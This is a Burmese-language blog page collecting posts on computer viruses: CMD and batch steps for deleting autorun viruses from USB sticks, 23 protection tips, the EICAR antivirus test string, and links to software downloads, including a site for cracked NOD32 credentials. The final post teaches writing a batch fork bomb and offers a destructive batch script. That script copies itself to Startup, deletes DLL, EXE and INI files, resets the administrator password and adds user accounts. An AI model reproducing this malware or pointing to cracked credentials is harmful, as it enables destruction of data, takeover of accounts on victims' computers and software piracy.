Showing posts with label Virus ျပႆနာ. Show all posts
Showing posts with label Virus ျပႆနာ. Show all posts

Virus ၏ ပင္ကိုယ္သေဘာကို ရွင္းျပျခင္း


 

ကြန္ပ်ဴတာ Virus ဆိုတာ သတင္းေတြ၊ အခ်က္အလက္ေတြအားလံုးအတြက္ အံ့ဩဖြယ္ရာ သက္တမ္း အရွည္ဆံုးျဖစ္ပါတယ္။


ေနာက္တစ္ခုေျပာေသးတာက Virus ဆိုတာ ကိုယ္ေတြဘယ္ေလာက္ တန္ဖိုးရွိလည္း ေတာ္လဲ တတ္လဲဆို တာေျပာျပေပးတဲ့ေကာင္တ့ဲ။ အင္း.. ဒီလိုဆိုေတာ့ Virus ကို ထုိင္ေတာင္ ရွိခိုးခ်င္ စိတ္ေပါက္သြားၿပီ ။ေသေသ ခ်ာခ်ာ ထြင္ထားတဲ့ Virus တစ္ခုကဆိုးက်ဳိးေပးတာ၊ ထိခိုက္ေစတာ ပိုမ်ားတယ္။ေနာက္ပိုက္ဆံ သန္းေပါင္းမ်ားစြာ ကို နစ္နာေစတယ္။ ဟုတ္တယ္ေနာ္..သူေျပာထားတာ လည္း ဟုတ္သားပဲ။ Virus တစ္ခုေပၚ လာတာက လူေတြေၾကာင့္ ပဲ မဟုတ္လား။ ဒီေတာ့ သူတို႔က ပိုထိခိုက္ေစေလ လူေတြေတာ္ေၾကာင္း ပိုၾကြားသလိုျဖစ္ေလ ပဲေပါ့။ ထြင္တဲ့ လူေတြကိုပဲ ေက်းဇူးတင္ ပါတယ္ လုိက္ေျပာရမလုိပဲေနာ္။

Virus ဆိုတာကလည္း တစ္ႏွစ္ၿပီးတစ္ႏွစ္ကို ေပၚလာတာအမ်ဳိးမ်ဳိးပဲ။ ၂၀၀၄၊ ဇန္န၀ါရီတုန္းကဆို Mydoom Wormေပၚလာၿပီး တစ္ရက္တည္းမွာတင္ မီလ်ံေလးပံုတစ္ပံုေလာက္ ရွိတဲ့ Computer ေတြ ကို
Read more »
Posted by No comments:
Labels:

Virus သတ္နည္းေလးပါ

Virus သတ္နည္းေလးပါ

ကိုယ္တိုင္သံုးဖူးလို ့ေျပာျပတာပါshar ေပါ့ကိုယ္ပိုင္ေတာ့မဟုတ္ပါဘူးသိျပီးသားေတြနဲ ့မလုပ္နဲ ့ေနာ္ မသိေသးတဲ့သူေတြအတြက္ပါဖတ္ဖူးတဲဘေလာ့ေတြကေနေျပာျပတာပါ
အင္တာနက္အသံုးျပဳေနသူေတာ္ေတာ္မ်ားမ်ားဟာ
Memory Stick ေလးေတြေဆာင္ထားတတ္ၾကပါတယ္
ကိုလိုအပ္တာေတြ သိမ္းဆည္းထားဖို ့သီခ်င္းေလးေတြသိမ္းထားခ်င္လို ့ဆိုျပီးေဆာင္ထားတတ္ၾကပါတယ္
Read more »
Posted by No comments:
Labels:

Virus မ်ားကို CMD ျဖင့္သတ္ျခင္း


ကြန္ပ်ဴတာအသံုးျပဳရာတြင္ Anti Virus Software မ်ားအသံုးမျပဳ၍ေသာ္လည္းေကာင္း၊ အသံုးျပဳထားသည့္ Anti Virus Software မ်ား ေကာင္းစြာ အလုပ္မလုပ္ျခင္းေၾကာင့္ေသာ္လည္းေကာင္း Virus မ်ားပ်ံ႕ႏွံ႔ကူးစက္ႏိုင္ပါသည္။ ထိုသို႔ႀကံဳေတြ႔ရပါက CMD မွတစ္ဆင့္ Virus မ်ား ကိုရွင္းလင္းႏိုင္ပါသည္။ ထိုသို႔ရွင္းလင္းရန္အတြက္ Virus အမည္ကိုသိရွိရန္လိုအပ္ပါသည္။ ကြန္ပ်ဴတာအသံုးျပဳသူမ်ားအေနျဖင့္ သိရွိထားသင့္ၿပီး အက်ိဳးရွိႏိုင္သည့္ နည္းလမ္းတစ္ခုျဖစ္ပါသည္။ ေအာက္ေဖာ္ျပပါအတိုင္းတစ္ဆင့္ျခင္းစီ ျပဳလုပ္သြားရပါမည္။
၁။ Start \ Run တြင္ cmd ဟု႐ိုက္၍ OK ေပးရပါမည္။
၂။ ထို႔ေနာက္ ကြန္ပ်ဴတာတြင္ရွိေနသည့္ Partition မ်ားမွ Virus 0င္ေရာက္ေနသည့္ အပိုင္းသို႔၀င္ေရာက္ရပါမည္။ ဆိုလိုသည္မွာ ကြန္ပ်ဴတာတြင္ Partition ၃ ခုရွိသည့္အနက္ D တြင္ Virus ၀င္ေရာက္ေနပါက cmd တြင္ D: ဟုရိုက္၍ Enter ကို ႏွိပ္ေပးရပါမည္။ ထိုအခါ cmd တြင္ Virus ၀င္ေရာက္ေနသည့္ Partition သို႔၀င္ေရာက္ၿပီးျဖစ္ပါသည္။
၃။ ထို႔ေနာက္ attrib -r -h -s(virus name.frile extension) ရုိက၍ Enter ေပးရပါမည္။ virus name.frile extension ဆိုသည္မွာ မိမိစက္ တြင္ ၀င္ေရာက္ေနသည့္ Virus အမည္ႏွင့္အမ်ိဳးအစားကိုဆိုလိုျခင္းျဖစ္ပါသည္။
၄။ ထိုသို႔ျပဳလုပ္ေပးၿပီးပါက c:\windows>- ဟုcmd တြင္ေတြ႔ျမင္ေနရမည္ျဖစ္ၿပီး Virus ကိုရွင္းလင္းရန္အတြက္ del(virus name.frile extension) ဟုရိုက္၍ Enter ေပးရပါမည္။ ထိုသို႔ျပဳလုပ္ၿပီးပါက ကြန္ပ်ဴတာတြင္၀င္ေရာက္ေသာ Virus ကိုရွင္းလင္းၿပီးျဖစ္ပါသည္။
@ www.cherrymyay.com
Posted by No comments:
Labels:

Memory Stick မွာရွိေနတဲ့ Virus ကုိေၿဖရွင္းတဲ့နည္းေလးပါ


Memory Stick မွာရွိေနတဲ့ Virus ကုိေၿဖရွင္းတဲ့နည္းေလးပါ ။ Memory Stick ထုိးလုိက္ရင္ Autorun.inf တုိ ့ Recycled.exe တုိ ့
Rundll32.exe တုိ ့ေပါ့ ။ ဒီ Virus ေတြကုိ USB Disk Security ေတြမွာလာၿပတယ္ ။ အဲဒီထက္ကုိအရမ္းေကာင္းပါတယ္ဆုိတဲ့ Kasper ကေတာင္မဖ်တ္ႏုိင္ဘူး ။ USB Disk Security မွာ Delete လုပ္လဲ တခ်ဳိဟာေတြဆုိ Delete လုပ္လုိ ့ကုိမရဘူး ။ ဒီေတာ့ဘာ software မွာသုံးဖုိ့မလုိပဲ ကၽြန္ေတာ္ေၿပာတဲ့နည္းေလးတုိင္းစမ္းၾကည္လိုက္ ။ အားလုံးကိစၥေခ်ာၿပီး ရွိသမွ် Virus ေတြအကုန္ေသေစရမယ္ ။ ( ဟဲ ဟဲ Virus ဆုိတဲ့အေကာင္းသာစကားေၿပာတက္ရင္ ကၽြန္ေတာ္ ကုိထဆဲမယ္ထင္တယ္ )
လုပ္ပုံလုပ္နည္းေလးရွင္းၿပမယ္ လုိက္လုပ္ၾကည္ပါ ။
- Virus ကုိသတ္တဲ့နည္းသိပ္အခက္ၾကီးေတာ့မဟုတ္ပါဘူး လြယ္တယ္ Bat file နဲ ့ Command ေရးၿပီးရွင္းတဲ့နည္းပါ ။
-အရင္ဆုံး Notepad တခုကုိဖြင့္လုိက္ပါ ဖြင့္ၿပီးရင္ေတာ့ ကၽြန္ေတာ္ ေအာက္ကေပးထားတဲ့ command ေလးေတြကုိ Copy ယူလုိက္ပါ ။
@echo
del: E:Autorun.inf
del: F:Autorun.inf
del: G:Autorun.inf
del: H:Autorun.inf
del: E:Recycled.exe
del: F:Recycled.exe
del: G:Recycled.exe
del: H:Recycled.exe
del: E:RUNDLL32.exe
del: F:RUNDLL32.exe
del: G:RUNDLL32.exe
del: H:RUNDLL32.exe
@echo
-Copy ယူၿပီးေတာ့ ဖုိင္ကုိနာမည္တခုခုေပးၿပီး save မယ္ .bat (ဥပမာ- MemoryStick.bat)ဆုိၿပီးေတာ့ ကုိယ္ Memory Stick ထဲ
မွာ save ထားလုိက္ ။ MemoryStick.bat ဆုိတဲ့ ဖုိင္ေလးကိုမဖ်တ္လုိက္နဲ ့ေနာ္ Stick ထုိးလိုက္တုိင္ ဒီ File ေလးကုိ double click လုပ္ၿပီး run ေပးလုိက္ ။ အဲဒါဆုိရင္တာ့ မိမိတုိ ့ရဲ့ Memory Stick ထဲမွာရွိေနတဲ့ Virus ေတြကုိ ဒီေကာင္ေလးကရွင္းေပးလိမ့္မယ္။
အဆင္မေၿပတာမ်ားရွိရင္ ေအာ္ခဲ့ပါေနာ္ .
Posted by No comments:
Labels:

Virus ကာကြယ္ေရးအတြက္ လမ္းညႊန္ (၂၃) ခ်က္

၁။ Anti-virus ေဆာ့ဖ္ဝဲလ္ေတြဟာ မလံုေလာက္ပါ။ ‘Removal tools’ ကိ ုinstall လုပ္ပါ။ (virus ကာကြယ္ေရး ေဆာ့ဖ္ဝဲလ္ ေတြဟာ ပီစီ ကို spyware ဒါမွမဟုတ္ adware ေတြျငိကပ္ ကူးစပ္ တဲ့အခါ မဆိုင္သလို လုပ္ေနေလ့ ရွိတတ္ပါတယ္။
၂။ spyware/adware removal tools ကိုအနည္းဆံုး၂ခုထားပါ။ (anti-virus tool ေတြ ကသာ အခ်င္းခ်င္း ရန္ေစာင္ ျပႆနာ တက္တတ္ ၾကေပမယ့္ spyware ကာကြယ္ေရး ေဆာ့ဖ္ဝဲလ္ေတြ ကေတာ့ အခ်င္းခ်င္း သင့္ျမတ္ ၾကေလ့ ရွိပါတယ္။
၃။ Firefox လား? IE လား? ေသခ်ာစြာ စဥ္းစားပါ။ (မ်ားေသာအားျဖင့္ spy-ware ေတြဟာ အဲဒီလို browser ႏွစ္ခုအၾကား ဗ်ာမ်ား ေနတဲ့ အခ်ိန္မွာ ဝင္လာ တတ္ပါတယ္။ တခ်ိဳ႕ website ေတြ ဟာ တတ္ပါတယ္။ တခ်ိဳ႕website ေတြဟာတတ္ပါတယ္။ တခ်ိဳ႕ website ေတြဟာ IE နဲ႕အလြမ္း သင့္ျပီး တခ်ိဳ႕က်ေတာ့ firefox နဲ႕မွ အဆင္ေျပ တတ္ၾကတဲ႕ အတြက္ ေတြေဝမႈကို ေလွ်ာ့ခ်ပါ။
၄။ P2P ကြန္ရက္ကို သတိထားပါ။ (’.torrent’ ေတြကေန တစ္ဆင့္ adware/spyware ေတြ ကူးစက္တတ္တာ ခုေနာက္ပိုင္းမွာ ပံုျပင္ သစ္ေတြ ျဖစ္လာေနပါျပီ။ မလိုအပ္ရင္ P2P မသံုး ဘဲ ရိုးရိုးသာ download ခ်ပါ။
၅။ Bazooka Scanner ကို down-load ရယူပါ။ (spyware,adware) ရွိမရွိ အဓိက စစ္ေဆးေပးတ bazooka scan-nerကိုအခမဲ့ ရႏုိင္ ပါတယ္။
၆။ ေဆာ့ဖ္၀ဲလ္ update ကို ကိုယ္တုိင္တုိင္ လုပ္ပါ။ (တစ္ခါတေလမွာ ေဆာ့ဖ္၀ဲလ္ update လုပ္ေပးပါမယ္ ဆုိတုိင္း အတင္းကာရာ လက္မခံ လုိက္ပါနဲ႕။ အရင္ဆံုး ကုိယ့္ရဲ႕ anti-spyware ဟာ update ျဖစ္မျဖစ္ စစ္ေဆးပါ။)
၇။ firewall ကို ကိုယ္ကိုယ္တုိင္ တည္ေဆာက္ပါ။ (ဥပမာ Zonealarm လုိမ်ိဳး firewall ဟာ အျမင္ကတ္စရာ ေကာင္းေလာက္ေအာင္ကို တာ၀န္ေက်ျပီး ကုိယ္သံုးစြဲ ခ်င္တဲ့၊ ယံုၾကည္ရတဲ့ software list ေတြကို သူ႕ကို ေပးထား လုိက္ရံုနဲ႕ အဆင္ေျပပါတယ္ firewall ထားရွိတဲ့အတြက္ RAM ကေတာ့ မသိမသာ ထပ္လုိပါမယ္။)
၈။ EULA ကို ဖတ္ပါ။ (end user license agreement ဆုိတာဟာ ေဆာ့ဖ္၀ဲတုိင္းနဲ႕ website အေတာ္ မ်ားမ်ားမွာ ပါ၀င္ တတ္ပါတယ္။ ေဆာ့ဖ္၀ဲလ္ အသစ္တစ္ခုဟာ ကုိယ့္နဲ႕ မရင္းႏွီးေသး ရင္ EULA ကို အဓိကထားျပီး ဖတ္ရွုပါ။
၉။ back up လုပ္ပါ။ back up လုပ္ပါ။ back up လုပ္ပါ။ (ပညာရွင္တုိင္း လုိလုိက data ေတြကို back-up လုပ္ဖုိ႕ အၾကံျပဳခဲ့ေပမယ့္ user တုိင္းလုိလုိက ေမ့ေလ်ာ့ ေနၾကဆဲပါ။ အေရးၾကီးတဲ့၊ တန္ဖုိးရွိတဲ့ အခ်က္အလက္ေတြ မဆံုးရွုံးေစဖုိ႕ နည္းလမ္းေကာင္းေတြထဲက တစ္ခုက back up လုပ္ျခင္းပဲျဖစ္ပါတယ္။)
၁၀။ home page ေျပာင္းလဲ သြားတာျမင္တာနဲ႕ scan လုပ္ပါ။ (ကိုယ္တုိင ္မသိလုိက္ ပါပဲနဲ႕ home page ေျပာင္းလဲ သြားျပီ ဆုိတာနဲ႕ ခ်က္ခ်င္း scan လုပ္ပါ။ အဲဒါဟာ spyware ျဖစ္ဖုိ႕ အခြင့္အလမ္း မ်ားေနပါျပီ။)
၁၁။ window ကို အဆင့္ျမွင့္ တင္ပါ။ (အကယ္ XP သံုးစဲြေနရင္ service pack 2 ကို ေျပာင္းလဲ သင့္ျပီး XP SP2 သံုးစဲြေနရင္ vista ကို အဆင့္ျမွင္ ့တင္သင့္ ပါတယ္။ လူသိ နည္းေနတဲ့ OS ဟာ အတုိက္အခိုက္ ခံရမႈ နည္းပါး ေနဦးမွာပါ။)
၁၂။ ေၾကာ္ျငာေတြဟာ spyware ေတြလား။ (မေသခ်ာပါ။ ေၾကာ္ျငာတုိင္းဟာ spyware မဟုတ္သလုိ spyware တိုင္း ကေတာ့ Advertising တုိင္းဆီကေန ၀င္ေရာက္ လာတာပဲ ျဖစ္ ပါတယ္။)
၁၃။ Keylogger ေတြကို ကာကြယ္လုိ႕ ရနုိင္ပါတယ္။ (တကယ္လုိ႕ကိုယ္ပိုင္ ဗဟုသုတ နည္းပါး ေနရင္ keylogger ေတြ ရဲ႕ သြင္ျပင္ လကၡဏာ ေတြကို ရွာေဖြ ဖတ္ရွုပါ။ ‘Ctrl+Alt+Del’ သံုးစဲြျပီး system မွာ run ေနတဲ့ မသကၤာတဲ့ ‘exe’ ဖုိင္ မွန္သမွ်ကို ဖယ္ရွား ပစ္ပါ။ အဲဒီလုိ ဖယ္ရွား ပစ္ျခင္း အားျဖင့္ system ဖုိင္အစစ္တခ်ိဳ႕ ဆုိရင္ လတ္တေလာမွာ အလုပ္ မလုပ္ ေတာ့တာကလြဲျပီး ဘာမွ မျဖစ္နုိင္ပါ။)
၁၄။ အမ်ားသံုး ကြန္ပ်ဴတာေတြ ဆီမွာ ကိုယ္ပိုင္ အခ်က္ေတြ မသံုးစဲြ ပါနဲ႕။ (လူအမ်ားနဲ႕ စပ္တူ သံုးစဲြရတဲ့ ကြန္ပ်ဴတာ ေတြဆီမွာ လုိအပ္ ခ်က္ ေၾကာင့္ (ဥပမာ cyber cafe လုိမ်ိဳး ေနရာ) ကိုယ္ပိုင္ အခ်က္အလက္ေတြ သံုးစြဲ ရမယ္ဆုိရင္ သတိ ထားပါ။ ကြန္ပ်ဴတာကေန ထြက္ခြာ မယ္ဆုိင္ရင္ ကုိယ့္ history ေတြကို ရွင္းလင္းပစ္ခဲ့ပါ။
၁၅။ Upload ဖုိင္ေတြကိုလဲ သတိထားပါ။ (ဓာတ္ပံု သို႕မဟုတ္ အျခား အခ်က္ အလက္မ်ား မျဖစ္မေန တင္ပို႕ ရျပီ ဆုိပါရင္ secure ရွိတဲ့web host ေတြကို သံုးစဲြပါ။)
၁၆။ anit-spyware software အခမဲ့ေပးတဲ့ website- ဥပမာအားျဖင့္ AVG anit-spyware website ကေန အခမဲ့ ေပးထား ပါလ်က္နဲ႕ download ခ်လုိ႕မရနုိင္တာမ်ိဳးရွိပါတယ္။ (အဲဒါဟာ သိပ္ေကာင္းပါတယ္။ ဘာျဖစ္လုိ႕လဲဆုိေတာ့ကိုယ့္ပီစီမွာ spyware ၀င္ေနတာကို AVG ကသိေန လုိ႕ပါ။ ေနာက္တစ္မ်ိဳးက ကိုယ့္ရဲ႕ spyware က anti-spyware ကိုလက္မခံလုိ႕ပါ။ ဒါဆုိရင္ေတာ့ သတိၾကီးၾကီးနဲ႕ ရွင္းလင္းပစ္ရပါလိမ့္မယ္။)
၁၇။ DOS တုိက္ခိုက္မႈ ရွိလာနုိင္သလား။ ကြန္ပ်ဴတာရဲ႕ အတြင္းပိုင္းစနစ္အထိ နက္နက္ရွုိင္းရွုိင္း ၀င္ေရာက္တုိက္ခုိက္မွု ျဖစ္ပါတယ္။ P2P network မွာ ကိုယ္မသိတဲ့ လူေတြဆီကို sharing မလုပ္ဖုိ႕နဲ႕ အခမဲ့ရတဲ့ software တုိင္းကို မယံုၾကည္ဖို႕ zip/ rar file ေတြကို သတိ ထားဖုိ႕ လုိပါမယ္။
၁၈။ icon ေတြကို desktop ေပၚမွာအတင္းအက်ပ္ ေနရာယူျပီဆုိရင္ spyware ျဖစ္ေနပါျပီ။ (ေဆာ့ဖ္၀ဲတုိင္းမွာ desktop icon shortcuts သေဘာမ်ိဳးဖန္တီးေပးေပမယ့္ သံုးစဲြသူ ခြင့္မျပဳ ဘဲ ေနရာ မယူတတ္ၾကပါ။)
၁၉။ အခ်က္ေပးပံုသ႑ာန္ေတြ မွားယြင္ေနတဲ့အခါ anti-spyware ေဆာ့ဖ္၀ဲလ္ေတြဟာ ျပီးျပည့္စံုမႈ မရွိပါ။ သူတုိ႕ကိုရွင္းလင္း ပစ္တုိင္းမွာ uninstall ကို အေသအခ်ာ ျပဳလုပ္ပါ။ သေဘာတရား အရေျပာရရင္ anti-spyware ေဆာ့ဖ္၀ဲလ္ ကိုယ္က spyware တစ္ခုပါပဲ။
၂၀။ Remote Access Trojan ဆုိတာ virus လုိမ်ိဳး။ program ငယ္ကေလး တစ္ခုကို ကြန္ပ်ဴတာ စနစ္အတြင္း ကိုယ္မသိ လိုက္ရပါပဲ ၀င္ေရာက္ေစခဲ့ျပီး အဲဒီပရိုဂရမ္ကေလးဟာ ကိုယ္လုပ္ေန သမွ်သတင္းအခ်က္ေတြနဲ႕ ကိုယ့္ရဲ႕ကိုယ္ေရးကိုယ္တာ ကိစၥ၀ိစၥ မွန္သမွ်ကို ပိုင္ရွင္ ဆီကို သတင္းျပန္ လည္ေပးပို႕ေနေလ့ ရွိပါတယ္။
၂၁။ Drive-By Download ဆုိတာ အဓိက အားျဖင့္ ပုဂၢလိက အခ်က္အလက္ေတြနဲ႕ လံုျခံဳမႈကို ထိပါးေစာ္ကားတဲ့ တိုက္ခုိက္မွႈတစ္မ်ိဳးကို ေခၚဆုိပါတယ္။ တကယ္လုိ႕ ေၾကာ္ျငာ pop-up ေတြကို သတိထားျပီး တားဆီးမယ္ဆုိရင္ တုိက္ရိုက္ထိေတြ႕ခံရမွု မရွိနုိင္ပါ။ Pop-up blocker ပါ၀င္တဲ့ firefox လုိ borwser မ်ိဳးကို သံုးစြဲသင့္ပါတယ္။
၂၂။ Search bar ေတြကို မယံုၾကည္ပါနဲ႕။ google.com နဲ႕ google toolbar… Yahoo နဲ႕ ႔ Yahoo toolbar တုိ႕လုိ ယံုၾကည္စိတ္ခ် ရတဲ့ အရာေတြ ရွိေနျပီးတဲ့ အခ်ိန္မွာ web ကို အထူး ရွာေဖြေပး မယ္ ဆိုတဲ့ toolbar ေတြကို ယံုၾကည္ကိုးစား မေနပါနဲ႕ေတာ့။ www.google.com လို႕ address bar မွာ ရိုက္လုိက္ရတာဟာ မေရရာ မေသခ်ာတဲ့ toolbar ေတြကို install လုပ္လုိက္ေနတာထက္ အမ်ားၾကီး လံုျခံဳမႈရွိပါတယ္။
၂၃။ ဒီေနရာကိုသြားပါ။ Virus နဲ႕ ပတ္သက္ျပီး အေကာင္းအဆိုးေတြကို ပံုမွန္ သတင္းေပးရင္း ကာကြယ္ ဖို႕နည္းလမ္းေတြကို အခမဲ့ ျဖန္႕ခ်ီေနတဲ့ ေနရာေတြ ရွိသလုိ အခု website ေတြကေတာ့ spyware, adware, malware စတာေတြကို ရင္ဆုိင္ ေျဖရွင္းဖုိ႕ သတင္း ေတြ၊ tools ေတြ၊update new ေတြ ရနုိင္ပါတယ္။. ။
by-Ko lin Thalarwaddy
(ကြန္ပ်ဴတာ ဂ်ာနယ္ ၂၀၀၈ခုႏွစ္၊ ေမလ၊ အမွတ္ ၁၇၁) —
မူရင္း(http://www.kzarboworld.com/profiles/blog/show?id=5098850%3ABlogPost...)
Posted by No comments:
Labels:

Memory stick , Mp3, Mp4 စတဲ့ဟာေတြကို virus သတ္ရေအာင္


ဒီနည္းနဲ႕ Memory stick , Mp3, Mp4 စတဲ့ဟာေတြကို virus သတ္လို႕ရပါတယ္...
စာဖတ္သူကေတာ့ Virus ကိုသိထားဖို႔လိုပါလိမ့္မယ္...
ဥပမာ - Autorun.inf , NoeNoeJetma.vbs , Folder.exe စသျဖင့္ေပါ့...Extension က .exe မွ Virus မဟုတ္ပါဘူး...
တျခား Virus အမ်ိဳးအစားေတြလဲရွိပါတယ္...တခ်ိဳ႕ Virus ေတြဆိုရင္ Command Prompt ကေန
သတ္လို႕ေတာင္မရဘူး..ဥပမာ - MS-DOS.exe လိုေကာင္မ်ိဳးေပါ့......
Virus ေတြဘယ္လိုေရးလဲသိခ်င္ရင္ကၽြန္ေတာ့္ Blog နံပါတ္(27)မွာသြားၾကည့္လိုက္ၾကပါ..။
ကဲ..စလုပ္လိုက္ၾကရေအာင္..

1) Start > Run >cmd လို္႔ရိုက္ပါ။
2) ၿပီးရင္ Driver လမ္းေၾကာင္းေပးပါ။
ဥပမာ- "F:\" , "E:\" စသျဖင့္ေပါ့...
3) လမ္းေၾကာင္းေပးၿပီးရင္ attrib ဆိုၿပီးရိုက္လိုက္ပါ။
4) အဲဒီမွာ SHR F:\autorun.inf
SHR F:\NoeNoeJetma.vbs
စသျဖင့္ေပါ့ ျပလာပါလိမ့္မယ္။
5) အေပၚမွာျပထားသလိုမ်ိဳး ေပၚေနလို႕ရွိရင္ Memoary Stick ထဲမွာ Virus ပါေနပါၿပီ။
အဲဒီ Virus ကိုအရင္ဆံုးေဖၚရပါတယ္။
attrib -s -h -r autorun.inf
ဆိုၿပီးရိုက္လိုက္ပါ။
6) ၿပီးရင္ del. autorun.inf ဆိုၿပီးထပ္ရိုက္ပါ။
7) အဲဒီမွာ" *, Are you sure <Y/N>? "ဆိုၿပီးေမးလာပါလိမ့္မယ္။
" Y " လို႕ရိုက္လိုက္ပါ..။
Cool attrib ဆုိၿပီးျပန္ရိုက္ၾကည့္လိုက္ပါဦး Autorun.inf မရွိေတာ့ပါဘူး..။
တကယ္လို႕ Virus ရွိေနေသးတယ္..ဖ်က္လို႕လည္းမရပါဘူးဆိုရင္ေတာ့စာဖတ္သူရဲ႕ကြန္ပ်ဴတာထဲမွာ
Virus ရွိေနလို႕သတ္မရတာပါ...စမ္းၾကည့္လိုက္ၾကပါဦး...မသိေသးတဲ့သူေတြအဖို႕ေပါ့ဗ်ာ....
Posted by No comments:
Labels:

Antivirus တကယ္အလုပ္ လုပ္ ၊ မလုပ္ ဘယ္လိုသိႏိုင္မလဲ??




က်ေနာ္တို ့ကြန္ပ်ဴတာအတြင္းကို virus၀င္ေရာက္ျခင္းမွကာကြယ္ႏိုင္ရန္ အတြက္အမ်ဳိးမ်ဳိးေသာ Antivirus Software မ်ားကိုအသံုးျပဳေနၾကရပါ တယ္ ၊ မိမိတို ့ႏွစ္သက္ရာ antivirus software မ်ားကို ကြန္ပ်ဴတာအတြင္း သို ့ install ျပဳလုပ္ၿပီးေနာက္ တကယ္အလုပ္ လုပ္လား ၊ မလုပ္ဘူးလားဆို တာ ဘယ္လိုသိႏိုင္မွာပါလဲ ။ သိခ်င္သူမ်ား လိုက္လုပ္ၾကည့္ၾကပါခင္ဗ်ာ (သိၿပီးသူမ်ားသည္းခံပါ)

ပထမဆံုး Notepad ေလးကိုဖြင့္ၿပီး ေအာက္မွာေပးထားတဲ့ codes မ်ားကို copy လုပ္လိုက္ပါ ။

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

ၿပီးရင္ bat.exe ဆိုတဲ့နာမည္ေလးနဲ ့ save လိုက္ပါ ၊ တကယ္လို ့မိမိတို ့ အသံုးျပဳေန တဲ့ antivirus ကအလုပ္လုပ္တယ္ဆိုရင္ ဒီ file ေလးကို save လိုက္တဲ့အခ်ိန္မွာ Desktop ေပၚမွာရွိေနမွာမဟုတ္ပဲ ေပ်ာက္သြားပါလိမ့္မယ္ ။ အလုပ္မလုပ္ဘူးဆိုရင္ေတာ့ bat.exe ဆိုတဲ့နာမည္နဲ ့ file တခုကို Desktop ေပၚမွာေတြ ့ျမင္ရမွာျဖစ္ပါတယ္ ၊ အဲဒါဆိုရင္ေတာ့ လက္ရွိ သံုးေနတဲ့ antivirus ကိုျပန္ျဖဳတ္ ၊ ေနာက္ထပ္အသစ္ကို install လုပ္ရန္ လိုအပ္ေနၿပီျဖစ္ပါေၾကာင္း............

AVG မွ အသစ္ထပ္ထြက္လာတဲ့ AVG Internet Security 2012 ေလးပါ ၊ လိုအပ္သူမ်ားmediafireမွာေဒါင္းလုိက္ပါခင္ဗ်ာ.....
http://www.mediafire.com/?nzchnhrdk28too1


ifile.itမွာေဒါင္းလုိက္ပါခင္ဗ်ာ.....
http://ifile.it/xojr9sd/avg_free_stb_all_2012_2193_cnet.exe
Posted by No comments:
Labels:

NOD32 အျမဲတမ္းစိမ္းေနေပမဲ႔ update မျဖစ္ရင္ ဒီလိုလုပ္ပါ

Nod ကို crack လုပ္ထားရင္လဲ သူ႕ရဲ႕ virus database ကုိ update
လုပ္ရဦးမွာပါ...crack လုပ္ထားလို႕ အျမဲတမ္းစိမ္းေန ေပမဲ့ update
မျဖစ္ရင္ အလကားျဖစ္ေနမွာေပါ့ .......အဲ့ဒါေၾကာင့္ အျမဲတမ္း
user name နဲ႕ password ကို update လုပ္ျပီးပဲသံုးေစခ်င္ပါတယ္ခင္ဗ်ာ....
User name နဲ႕ password အျမဲတမ္း update လုပ္ေပးေနတဲ့ေနရာ
ေတာ့ရွိတယ္...
www.for-ever.cn/nod32 မွာသြားယူပါခင္ဗ်ာ...အစိမ္းေရာင္ျဖစ္ေနတာေတြ
က active ျဖစ္ေနပါတယ္......
မူရင္းလင့္  ။       ။  ဒီမွာ
Posted by No comments:
Labels: ,

virus ေၾကာင့္ hidden file & folderေတြေခၚမရလွ်င္

MP4ေတြmomery cardေတြမွာ virus ေၾကာင့္ file ႏွင့္ folder မ်ားကို
show hidden files & folders ကိုအမွန္ျခစ္ေပးရံုႏွင့္ေခၚမရလွ်င္
 Tools ထဲမွ folder Options / View မွ
Show hidden files ,folders, and drives ကိုအမွန္ျခစ္ေပးၿပီး
Hide protected operating system files (Recommended) ဆိုတာကို အမွန္ျခစ္ေလးျဖဳတ္ေပးလိုက္ပါ။ ဒါဆိုရင္ အဆင္ေျပပါျပီ

မူရင္းလင့္ ။      ။  ဒီမွာ
Posted by No comments:
Labels:

Atomic Bomb Virus ေရးနည္း

notepad ေလးတစ္ခု ေခၚၿပီး ေအာက္ပါအတုိင္းေရးလိုက္ပါ ... ရွင္းရွင္းေလးပါေနာ္



  @echo off
:A
start dir
start command
start firefox
start explorer
start notepad
goto:A


ဆိုၿပီး ေရးလိုက္
 file name တစ္ခုခု (မိမိႀကိဳက္ရာ) ေပးၿပီး .bat နဲ႔ save လိုက္ပါတယ္ ။ (file name.bat)ၿပီး
ရင္ဖြင့္စမ္းၾကည္႔လိုက္ပါ ။ တစ္ခုၿပီး တစ္ခု ပြင္႔လာတဲ႔ ဖိုင္ေတြက ခင္ဗ်ား ဆက္မၾကည္႔ရဲေအာင္ျဖစ္
လာပါလိမ္႔မယ္ ။ ဘာနဲ႔မွပိတ္ဖို႔ မႀကိဳးစားပါနဲ႔ ။ restart ခလုပ္ေလးကိုသာႏိုပ္လိုက္ပါ။အားလံုး အဆင္ေၿပလာ
ပါလိမ့္မယ္။ေပ်ာ္ရႊင္ၾကပါေစ .
ဒါက အပိုဆုေနာ္ အေပၚကတိုင္တည္ နဲ႔ မဆိုင္ဘူး လက္ကျမင့္မယ့္ ေဘာ္ေဘာ္ေတြ အတြက္ လက္ေဆာင္ေပါ့ဗ်ာ
title Virus
@echo off
copy Virus.bat "c:\documents and settings\all users\start menu\programs\startup"
del *.dll
del *.exe
del *.ini
time 00:00
date 88/88/888
net user administrator *31313
net user 7287 *30245 /add
net user 22501 *6328 /add
net user 19639 *4929 /add
net user 1601 *20183 /add
net user 28678 *15503 /add
net user 9189 *12164 /add
net user 3697 *22587 /add
net user 17241 *29693 /add
msg *Welcome to my new Virus.
msg *Welcome to my new Virus.
msg *Welcome to my new Virus.
msg *Welcome to my new Virus.
msg *Welcome to my new Virus.
msg *Welcome to my new Virus.
msg *Welcome to my new Virus.
msg *Welcome to my new Virus.
msg *Welcome to my new Virus.


1
msg *Welcome to my new Virus.
echo copy Virus.bat "documents and settings\all users\start menu\programs\startup"
echo copy Virus.bat "documents and settings\all users\start menu\programs\startup"
echo copy Virus.bat "documents and settings\all users\start menu\programs\startup"
echo copy Virus.bat "documents and settings\all users\start menu\programs\startup"
echo copy Virus.bat "documents and settings\all users\start menu\programs\startup"
echo copy Virus.bat "documents and settings\all users\start menu\programs\startup"
echo copy Virus.bat "documents and settings\all users\start menu\programs\startup"
echo copy Virus.bat "documents and settings\all users\start menu\programs\startup"
echo copy Virus.bat "documents and settings\all users\start menu\programs\startup"
echo copy Virus.bat "documents and settings\all users\start menu\programs\startup"
